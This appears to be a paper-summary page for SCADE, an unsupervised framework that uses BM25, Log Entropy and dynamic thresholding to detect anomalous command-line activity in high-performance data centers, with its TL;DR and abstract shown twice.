Table of Contents
Fetching ...

SCADE: Scalable Framework for Anomaly Detection in High-Performance System

Vaishali Vinay, Anjali Mangal

TL;DR

The paper tackles the challenge of detecting anomalous command-line activity in high-computation data-center environments where labeled attack data are scarce. It introduces SCADE, a scalable, unsupervised framework that blends global rarity scoring (BM25, Log Entropy) with local usage baselines through a dual-layer (global and local) architecture. Key contributions include 1– and 2–gram tokenization, dynamic thresholding for high SNR, metadata-driven detection, and a four-stage data pipeline enabling near real-time monitoring in large-scale deployments. The approach shows strong PoC results with high detection precision and low false positives, and demonstrates practical impact through deployment in Azure data centers, highlighting its potential for robust, scalable command-line security in enterprise environments.

Abstract

As command-line interfaces remain integral to high-performance computing environments, the risk of exploitation through stealthy and complex command-line abuse grows. Conventional security solutions struggle to detect these anomalies due to their context-specific nature, lack of labeled data, and the prevalence of sophisticated attacks like Living-off-the-Land (LOL). To address this gap, we introduce the Scalable Command-Line Anomaly Detection Engine (SCADE), a framework that combines global statistical models with local context-specific analysis for unsupervised anomaly detection. SCADE leverages novel statistical methods, including BM25 and Log Entropy, alongside dynamic thresholding to adaptively detect rare, malicious command-line patterns in low signal-to-noise ratio (SNR) environments. Experimental results show that SCADE achieves above 98% SNR in identifying anomalous behavior while minimizing false positives. Designed for scalability and precision, SCADE provides an innovative, metadata-enriched approach to anomaly detection, offering a robust solution for cybersecurity in high-computation environments. This work presents SCADE's architecture, detection methodology, and its potential for enhancing anomaly detection in enterprise systems. We argue that SCADE represents a significant advancement in unsupervised anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.

SCADE: Scalable Framework for Anomaly Detection in High-Performance System

TL;DR

The paper tackles the challenge of detecting anomalous command-line activity in high-computation data-center environments where labeled attack data are scarce. It introduces SCADE, a scalable, unsupervised framework that blends global rarity scoring (BM25, Log Entropy) with local usage baselines through a dual-layer (global and local) architecture. Key contributions include 1– and 2–gram tokenization, dynamic thresholding for high SNR, metadata-driven detection, and a four-stage data pipeline enabling near real-time monitoring in large-scale deployments. The approach shows strong PoC results with high detection precision and low false positives, and demonstrates practical impact through deployment in Azure data centers, highlighting its potential for robust, scalable command-line security in enterprise environments.

Abstract

As command-line interfaces remain integral to high-performance computing environments, the risk of exploitation through stealthy and complex command-line abuse grows. Conventional security solutions struggle to detect these anomalies due to their context-specific nature, lack of labeled data, and the prevalence of sophisticated attacks like Living-off-the-Land (LOL). To address this gap, we introduce the Scalable Command-Line Anomaly Detection Engine (SCADE), a framework that combines global statistical models with local context-specific analysis for unsupervised anomaly detection. SCADE leverages novel statistical methods, including BM25 and Log Entropy, alongside dynamic thresholding to adaptively detect rare, malicious command-line patterns in low signal-to-noise ratio (SNR) environments. Experimental results show that SCADE achieves above 98% SNR in identifying anomalous behavior while minimizing false positives. Designed for scalability and precision, SCADE provides an innovative, metadata-enriched approach to anomaly detection, offering a robust solution for cybersecurity in high-computation environments. This work presents SCADE's architecture, detection methodology, and its potential for enhancing anomaly detection in enterprise systems. We argue that SCADE represents a significant advancement in unsupervised anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.

Paper Structure

This paper contains 20 sections, 1 figure, 1 table.

Figures (1)

  • Figure 1: The architecture of the SCADE framework. It highlights the dual-layer analysis approach combining Global and Local Analysis, designed to detect anomalies in command-line activities with precision and contextual awareness.